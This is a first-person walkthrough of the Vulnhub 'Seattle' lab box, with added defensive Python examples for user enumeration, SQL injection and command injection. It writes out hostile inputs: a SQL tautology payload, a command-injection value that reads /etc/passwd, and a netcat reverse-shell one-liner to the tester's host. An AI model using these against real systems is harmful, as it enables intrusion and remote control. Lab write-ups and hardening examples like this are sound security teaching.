Seattle Vulnhub

Chill, I got the admin panel and a shell, though the shell privilege was only apache. I gained some knowledge of SQL injection and I used Burp Suite.

Let's Breach


Penetration Methodologies:

Finding the IP

  • Nmap

Enumeration

  • Browsing the HTTP service
  • Directory bruteforce using dirb

Exploitation

  • SQL injection
  • Reverse shell using nc


I got the IP of the victim machine: it was 192.168.1.10.

I used Nmap to scan which ports were open and found that only port 80 was open, running Apache 2.4.16. I didn't find any serious exploit for it.


The OS was Fedora.

I browsed port 80 and found what looked like an online shopping page (I don't know whether I was right or wrong about that).




Then I went for directory bruteforcing using dirb, my favourite tool. However, you can also use gobuster, which some people highly recommended to me because of its features.

dirb http://192.168.1.10

And boom, I got the admin.php directory. That was quick.



In the page source of index.php I found terms.php, which I could use later, so I saved it in my text editor.

While enumerating for the admin panel, I found an email address at the bottom of that page:

admin@seattlesounds.net





Then I went to /admin and found some PHP files; admin.php was a login page.

I registered test@gmail.com and logged in as test.

I got logged in as test; you can just do it manually. However, I first tried a wrong email and a wrong password, and then test@gmail.com with a wrong password, and I found something interesting.

There were two things to see.







"Invalid username" and "Invalid password" were the results, which is what I expected, but




with the right email and a wrong password the result was different, and that is interesting.

So, let's use the mail we found on the terms.php page,

and the result was interesting:

"Invalid password" means the email was correct.
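The behaviour above is a user enumeration weakness: because the form answers "Invalid username" for an unknown address and "Invalid password" for a known one, an outsider can confirm which accounts exist before ever guessing a password. The following Python is an added example (not code from the walkthrough or from the Seattle box) that models that leaky login handler beside a hardened one returning a single generic message and doing the same password-hash work on both paths, so neither the text nor the response time reveals whether the email exists. The admin address is the one found on terms.php; the password, salts and the `login_leaky` / `login_hardened` names are assumptions for this demo.

```python
import hashlib
import hmac
import os

GENERIC_ERROR = "Invalid email or password"


def _hash(password: str, salt: bytes) -> bytes:
    """PBKDF2-SHA256; the iteration count is kept modest for a demo."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user store: email -> (salt, hash). The address is the one the
# walkthrough found on terms.php; the password is an assumption for this demo.
_SALT = os.urandom(16)
USERS = {"admin@seattlesounds.net": (_SALT, _hash("demo-password", _SALT))}

# Dummy credential so the hardened path costs the same whether or not the
# email exists (a timing side channel must not replace the message one).
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("dummy", _DUMMY_SALT)


def login_leaky(email: str, password: str) -> str:
    """What the Seattle login does: a different message for each failure case."""
    if email not in USERS:
        return "Invalid username"
    salt, stored = USERS[email]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return "Invalid password"
    return "OK"


def login_hardened(email: str, password: str) -> str:
    """One generic message, and the same hashing work on every path."""
    salt, stored = USERS.get(email, (_DUMMY_SALT, _DUMMY_HASH))
    match = hmac.compare_digest(_hash(password, salt), stored)
    if match and email in USERS:
        return "OK"
    return GENERIC_ERROR


def enumerates_users(login) -> bool:
    """True if a caller can tell an unknown email from a wrong password."""
    known = login("admin@seattlesounds.net", "not-the-password")
    unknown = login("nobody@seattlesounds.net", "not-the-password")
    return known != unknown


if __name__ == "__main__":
    print("leaky form leaks accounts:   ", enumerates_users(login_leaky))
    print("hardened form leaks accounts:", enumerates_users(login_hardened))
```

`enumerates_users` is the check a reviewer can run against any login function: feed it one known and one unknown address with the same wrong password and compare the two answers.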

Let's check for SQL injection; I thought that for this site it was the right choice. I fired up Burp and found that the vulnerability was SQL injection, which let me bypass the admin panel login. I was damn right.




Let's breach the admin panel.

Forwarding the page with this request was enough to reach the admin page.

I think the page could also be reached just by typing the URL I was redirected to.
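To show the bug class behind that login bypass next to its fix, here is an added Python example (not the Seattle box's PHP and not code from the walkthrough). It keeps an in-memory SQLite stand-in for the shop's user table and implements the login twice: once by splicing the submitted email and password into the SQL text, so a quote in the input changes the query's meaning, and once with bound parameters, so the input is only ever compared as data. The table layout, the password value and the function names are assumptions; the admin address is the one the page found.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the shop's user table (a plaintext
    password only to keep the SQL readable; a real store holds hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT, is_admin INTEGER)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin@seattlesounds.net", "demo-password", 1))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """The pattern behind the admin.php bypass: input spliced into SQL text,
    so quotes and operators in the input become part of the query grammar."""
    query = ("SELECT is_admin FROM users WHERE email = '%s' AND password = '%s'"
             % (email, password))
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """The fix: bound parameters are compared as values, never parsed as SQL."""
    row = conn.execute(
        "SELECT is_admin FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_demo_db()
    # The textbook tautology, submitted as the password field.
    tautology = "' OR '1'='1"
    print("vulnerable, real creds:  ",
          login_vulnerable(db, "admin@seattlesounds.net", "demo-password"))
    print("vulnerable, tautology:   ", login_vulnerable(db, "anyone", tautology))
    print("parameterized, tautology:", login_parameterized(db, "anyone", tautology))
```

With the tautology as the password, the spliced query reads `... WHERE email = 'anyone' AND password = '' OR '1'='1'`, which matches every row, while the parameterized query looks for a literal password of `' OR '1'='1` and finds nothing. Logging queries that return a row for an email that does not exist, as the first print line would, is a simple detection signal for this class of bypass.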




The page was fully loaded with input text fields. I thought of command injection and found that in the Log Name field you can just type

'cat /etc/passwd' 2>&1;

to see all the text of the /etc/passwd file. This confirms that I could land my reverse shell in the Log input.



Let's do a reverse shell with netcat on port 9999:

'nc -e /bin/sh 192.168.1.8 9999' 2>&1;
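The Log Name field works as an injection point because the application pastes the submitted name into a shell command line, so `;`, backticks and redirections in the input are interpreted by the shell. The following Python is an added example (not the box's code and not from the walkthrough) of a log viewer written both ways: the vulnerable form builds a command string, and the hardened form allowlists the name, pins the resolved path inside the log directory and passes argv directly so no shell ever parses the input. The log directory, the sample log file and the function names are constructed for the demo; the page does not name the real directory.

```python
import os
import re
import subprocess
import tempfile

# Constructed log directory with one sample file. It stands in for whatever
# directory the real Log Name field reads from, which the page does not name.
LOG_DIR = tempfile.mkdtemp(prefix="seattle-demo-")
SAMPLE = "GET /index.php 200\nGET /admin.php 200\n"
with open(os.path.join(LOG_DIR, "access.log"), "w") as fh:
    fh.write(SAMPLE)

# Only plain file-name characters; no '/', ';', quotes, backticks or spaces.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def view_log_vulnerable(name: str) -> str:
    """The page's bug pattern: user input pasted into a shell command line,
    so ';', '`', '|' and redirections in the input are run by the shell."""
    cmd = "cat %s/%s" % (LOG_DIR, name)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def view_log_hardened(name: str) -> str:
    """Allowlist the name, pin the path inside LOG_DIR, and pass argv
    directly so no shell ever parses the input."""
    if not SAFE_NAME.match(name):
        raise ValueError("log name contains disallowed characters")
    path = os.path.realpath(os.path.join(LOG_DIR, name))
    # Catches '..' (which the regex alone would allow) and any symlink escape.
    if os.path.dirname(path) != os.path.realpath(LOG_DIR):
        raise ValueError("log name escapes the log directory")
    proc = subprocess.run(["cat", path], capture_output=True, text=True, check=True)
    return proc.stdout


def is_rejected(name: str) -> bool:
    """True if the hardened viewer refuses the name instead of running it."""
    try:
        view_log_hardened(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # A harmless marker command shows whether the input reached a shell.
    print(view_log_vulnerable("access.log; echo INJECTED"))
    print("hardened rejects it:", is_rejected("access.log; echo INJECTED"))
```

On the vulnerable path the marker text appears in the output because the shell ran a second command; on the hardened path the same input never reaches a shell and is refused before any process starts. In web server logs, POST bodies to the log viewer containing `;`, backticks or `2>&1` are the thing to alert on.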




Boom, I got the reverse shell.






The box was not that hard.


 HAPPY HACKING :)


















